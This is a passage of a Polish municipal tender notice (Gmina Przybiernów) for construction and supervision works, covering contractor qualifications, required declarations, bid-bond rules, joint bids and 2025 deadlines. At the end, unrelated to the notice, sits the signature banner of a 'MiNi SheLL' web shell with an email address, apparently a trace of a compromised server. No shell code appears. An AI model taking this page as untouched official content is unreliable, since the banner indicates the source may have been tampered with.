zamówienia mogą ubiegać się wykonawcy, którzy wykażą minimalne poziomy zdolności w zakresie<br/>dysponowania następującymi osobami zdolnymi do wykonania zamówienia:<br/>a) inspektor nadzoru robót budowlanych w specjalności inżynieryjnej konstrukcyjno-budowlanej – minimalne wymagania:<br/>- kwalifikacje zawodowe: uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi odpowiadające<br/>przedmiotowi zamówienia w specjalności konstrukcyjno - budowlanej w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo<br/>budowlane (t.j. Dz.U. z 2024 r. poz. 725, z późn. zm.) lub odpowiadające im uprawnienia budowlane, które zostały wydane<br/>na podstawie wcześniej obowiązujących przepisów,<br/>b) inspektor nadzoru robót budowlanych w specjalności sanitarnej – minimalne wymagania:<br/>- kwalifikacje zawodowe: uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności<br/>instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych<br/>w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz.U. z 2024 r. poz. 725, z późn. zm.) lub odpowiadające<br/>im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,<br/>c) inspektor nadzoru robót budowlanych w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i<br/>elektroenergetycznych – minimalne wymagania: kwalifikacje zawodowe: uprawnienia budowlane bez ograniczeń do<br/>kierowania robotami budowlanymi odpowiadające przedmiotowi zamówienia w specjalności instalacyjnej w zakresie sieci,<br/>instalacji i urządzeń elektrycznych i elektroenergetycznych w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j.Dz.U. z 2024 r. poz. 725, z późn. zm.) lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie<br/>wcześniej obowiązujących przepisów. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1 Do oferty Wykonawca<br/>zobowiązany jest dołączyć aktualne na dzień składania ofert:<br/>1. oświadczenie o braku podstaw do wykluczenia z postępowania dla odpowiedniej części na którą Wykonawca składa ofertę -<br/>zgodnie z załącznikiem nr 3.1 do SWZ dla części nr 1, załącznikiem nr 3.2 do SWZ dla części nr 2, załącznikiem nr 3.3 do SWZ dla<br/>części nr 3,<br/>Oświadczenia, o którym mowa w pkt 14.1 SWZ, potwierdzające brak podstaw do wykluczenia, spełnianie warunków udziału w<br/>postępowaniu odpowiednio na dzień składania ofert, tymczasowo zastępują wymagane przez Zamawiającego podmiotowe środki<br/>dowodowe.<br/>Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5<br/>dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na ich dzień złożenia.<br/>Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>1. Dla wszystkich części - Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej<br/>grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z<br/>innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy<br/>należącego do tej samej grupy kapitałowej – z załącznikiem nr 8.1 do SWZ dla części nr 1, załącznikiem nr 8.2 do SWZ dla części nr<br/>2, załącznikiem nr 8.3 do SWZ dla części nr 3</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Do<br/>oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert:1) oświadczenia Wykonawcy o spełnianiu warunków<br/>udziału w postępowaniu dla odpowiedniej części na którą Wykonawca składa ofertę – zgodnie z zał nr 2.1 do SWZ dla cz nr 1, zał nr<br/>2.2 do SWZ dla części nr 2, zgodnie z zał nr 2.3 do SWZ dla części nr 3,<br/>Dla wszystkich części - Ośw wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy<br/>kapitałowej,z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w<br/>postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od<br/>innego wykonawcy należącego do tej samej grupy kapitałowej – z zał nr 8.1 do SWZ dla części nr 1, zał nr 8.2 do SWZ dla części nr<br/>2, zał nr 8.3 do SWZ dla części nr 3<br/>2. Część nr 1, 2,<br/>1) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane<br/>zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne<br/>odpowiednie dokumenty- zgodnie z zał nr 5.1 do SWZ dla części nr 1, zgodnie z zał nr 5.2 do SWZ dla części nr 2,<br/>2) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – zgodnie z zał nr 6.1 do SWZ dla<br/>części nr 1, zgodnie z zał nr 6.2 do SWZ dla części nr 2, zgodnie z zał nr 6.3 do SWZ dla części nr 3,<br/>3. Część nr 3<br/>1) wykazu usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat<br/>przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których<br/>usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie,<br/>przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były<br/>wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym<br/>charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń<br/>okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny<br/>być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w<br/>postępowaniu; - zgodnie z zał nr 5.3 do SWZ dla części nr 3.<br/>2) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – zgodnie z zał nr 6.3 do SWZ dla<br/>części nr 3.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Na ofertę składają się:<br/>1) Dokumenty składane przez wszystkich wykonawców<br/>a) formularz ofertowy odpowiednio dla danej części na którą wykonawca składa ofertę przygotowany - zgodnie z<br/>załącznikiem nr 1.1 do SWZ dla części nr 1, załącznikiem nr 1.2 do SWZ dla części nr 2, załącznikiem nr 1.3 do SWZ dla<br/>części nr 3.<br/>b) oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu odpowiednio dla danej części na którą<br/>wykonawca składa ofertę przygotowane - zgodnie z załącznikiem nr 2.1 do SWZ dla części nr 1, załącznikiem nr 2.2 do<br/>SWZ dla części nr 2, załącznikiem nr 2.3 do SWZ dla części nr 3.<br/>c) oświadczenie o braku podstaw do wykluczenia z postępowania odpowiednio dla danej części na którą wykonawca składa<br/>ofertę przygotowane - zgodnie z załącznikiem nr 3.1 do SWZ dla części nr 1, załącznikiem nr 3.2 do SWZ dla części nr 2,<br/>załącznikiem nr 3.3 do SWZ dla części nr 3.<br/>d) pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>e) pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>(jeżeli dotyczy);<br/>f) zobowiązanie podmiotu udostępniającego zasoby Wykonawcy odpowiednio dla danej części na którą wykonawca składa<br/>ofertę przygotowany - zgodnie z załącznikiem nr 7.1 do SWZ dla części nr 1, załącznikiem nr 7.2 do SWZ dla części nr 2,<br/>załącznikiem nr 7.3 do SWZ dla części nr 3 (jeżeli dotyczy);<br/>g) oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz<br/>odpowiednio spełnienie warunków udziału w postępowaniu – odpowiednio dla danej części na którą wykonawca składa<br/>ofertę przygotowany zgodnie z załącznikiem nr 4.1 do SWZ dla części nr 1, załącznikiem nr 4.2 do SWZ dla części nr 2,<br/>załącznikiem nr 4.3 do SWZ dla części nr 3 (jeżeli dotyczy); <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Brzozowo, Czarnogłowy i zmiana sposobu użytkowania budynku hydroforni na świetlicę wiejską w Rokicie w wysokości 15<br/>000,00 zł (słownie: piętnaście tysięcy złotych 00/100). Dla części nr 2: Budowa świetlicy kontenerowej w Łoźnicy w<br/>wysokości 10 000,00 zł (słownie: dziesięć tysięcy złotych 00/100.<br/>28.1.1. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>a) pieniądzu;<br/>b) gwarancjach bankowych;<br/>c) gwarancjach ubezpieczeniowych;<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.. Dz.U. z 2023 r. poz. 462).<br/>28.2. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego otwarty w Banku BS<br/>Gryfice nr konta 43 9376 1011 0071 1717 2004 0007z adnotacją: Wadium – znak sprawy: GPB.271.6.2024 cz. 1 lub cz. 2<br/>28.3. Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać nieprzerwalnie do dnia upływu terminu<br/>związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>28.4. Wadium wniesione w pieniądzu uważa się za wniesione w sposób prawidłowy, gdy środki pieniężne zostaną uznane<br/>na koncie Zamawiającego przed upływem terminu składnia ofert.<br/>28.5. Wadium wnoszone w formie poręczeń lub gwarancji należy złożyć wraz z ofertą w oryginale w postaci elektronicznej tj.<br/>opatrzonej kwalifikowanym podpisem elektronicznymi osób upoważnionych do jego wystawienia. Wadium musi<br/>zabezpieczać ofertę na daną część zamówienia przez cały okres związania ofertą. Oferta Wykonawcy, który nie wniesie<br/>wadium lub wniesie wadium w sposób nieprawidłowy, lub nie będzie utrzymywał wadium nieprzerwalnie do upływu terminu<br/>związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, zostanie<br/>odrzucona z postępowania na podstawie art. 226 ust. 1 pkt 4 ustawy Pzp.<br/>28.6. Z treści wadium wnoszonego w formie: gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczenia udzielanego<br/>przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji<br/>Rozwoju Przedsiębiorczości, powinno wynikać bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez<br/>Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w<br/>przypadku wystąpienia okoliczności określonych w art. 98 ust 6 ustawy Pzp.<br/>28.7. W przypadku składania przez Wykonawcę wadium w formie gwarancji / poręczeń o których mowa w punkcie 28.1.1.<br/>(lit. b-d) gwarancja / poręczenie ma być sporządzona zgodnie z obowiązującym prawem i jej treść winna zawierać<br/>następujące elementy:<br/>a) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/ poręczenia (Zamawiającego), gwaranta (banku lub<br/>instytucji ubezpieczeniowej udzielających gwarancji/ poręczenia) oraz wskazanie ich siedzib;<br/>b) określenie przedmiotu zamówienia,c) określenie wierzytelności, która ma być zabezpieczona gwarancją/ poręczeniem-;<br/>d) kwotę gwarancji/ poręczenia;<br/>e) zobowiązanie gwaranta/ poręczyciela do zapłacenia bezwarunkowo i nieodwołalnie kwoty gwarancji/ poręczenia na<br/>pierwsze pisemne żądanie Zamawiającego w okolicznościach określonych w art. 98 ust. 6 ustawy Pzp.<br/>28.7.1. W przypadku wniesienia przez Wykonawcę wadium w formie niepieniężnej, jako Beneficjenta należy oznaczyć<br/>Gminę Przybiernów, ul. Cisowa 3, 72-110 Przybiernów.<br/>28.8. Wadium składane w formie gwarancji lub poręczania musi mieć datę początkową ważności równą co najmniej<br/>ostatecznemu terminowi składania ofert, a datę końcową ważności upływającą najwcześniej w ostatnim dniu związania<br/>ofertą.<br/>28.9. Zamawiający zwraca wadium w trybie i na warunkach określonych w art. 98 ust. 1- 5 ustawy Pzp.<br/>Zamawiający zatrzymuje wadium w okolicznościach określonych w art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 15.16. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>15.16.1 Wykonawcy składający ofertę wspólną ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy. Do oferty wspólnej Wykonawcy dołączają<br/>pełnomocnictwo.<br/>15.16.2 Pełnomocnik pozostaje w kontakcie z Zamawiającym w toku postępowania i do niego Zamawiający kieruje<br/>informacje, korespondencję, itp.<br/>15.16.3 Oferta wspólna, składana przez dwóch lub więcej Wykonawców, powinna spełniać następujące wymagania:<br/>a) oferta wspólna powinna być sporządzona zgodnie z SWZ,<br/>b) sposób składania dokumentów w ofercie wspólnej:<br/> dokumenty, dotyczące własnej firmy, takie jak np.: oświadczenie o braku podstaw do wykluczenia składa każdy z<br/>Wykonawców składających ofertę wspólną we własnym imieniu;<br/> dokumenty wspólne takie jak np.: formularz ofertowy, dokumenty podmiotowe i przedmiotowe składa pełnomocnik<br/>Wykonawców w imieniu wszystkich Wykonawców składających ofertę wspólną.<br/>15.17. Przed podpisaniem umowy (w przypadku wygrania postępowania) Wykonawcy składający ofertę wspólną będą mieli<br/>obowiązek przedstawić Zamawiającemu umowę konsorcjum, zawierającą, co najmniej:<br/>a) zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem realizację<br/>przedmiotu zamówienia,<br/>b) określenie zakresu działania poszczególnych stron umowy,<br/>c) czas obowiązywania umowy, który nie może być krótszy, niż okres obejmujący realizację zamówienia oraz czas trwania<br/>gwarancji jakości i rękojmi.<br/>15.18. Jeśli oferta zawiera informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16 kwietnia 1993<br/>r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2022 r. poz. 1233 z poź zm.), Wykonawca powinien nie później niż w<br/>terminie składania ofert, zastrzec, że nie mogą one być udostępnione oraz wykazać, iż zastrzeżone informacje stanowią<br/>tajemnicę przedsiębiorstwa.<br/>15.19. Jeżeli oferta zawiera informacje stanowiące tajemnice przedsiębiorstwa w rozumieniu przepisów art. 11 ustawy z dnia<br/>16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2022 r. poz.1233 z póź. zm.), wówczas informacje te<br/>muszą być wyodrębnione (zawarte) w osobnym pliku i zawierać wyraźne zastrzeżenie, że nie mogą być udostępnione. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia zostały określone w projektowanych postanowieniach<br/>umowy, które stanowią załącznik nr 9.1, 9.2, 9.3 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-02-28 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy Przetargowej Gminy Przybiernów https://przybiernow.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-02-28 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający na podstawie art. 95 ustawy Prawo zamówień publicznych wymaga zatrudnienia przez Wykonawcę lub<br/>podwykonawcę na podstawie umowy o pracę osób wykonujących czynności w zakresie realizacji zamówienia, jeżeli<br/>wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r.<br/>Kodeks pracy (t.j. Dz. U. z 2023 r. poz. 1465 ze zm.).<br/>Zamawiający wymaga zatrudnienia na podstawie umowy o pracę przez Wykonawcę lub Podwykonawcę osób<br/>wykonujących wskazane poniżej czynności w trakcie realizacji zamówienia :<br/>1. Dla części nr 1,2,<br/>czynności związane z obsługą sprzętu budowlanego,<br/>2. Dla części nr 3<br/>czynności związane z obsługą biurową i administracyjną inspektorów nadzoru,<br/>Z postępowania o udzielenie zamówienia wyklucza się Wykonawcę w przypadkach, o których mowa w art. 7 ust. 1<br/>ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę<br/>oraz służących ochronie bezpieczeństwa narodowego (Dz.U.2022, poz.835)

Creat By MiNi SheLL
Email: jattceo@gmail.com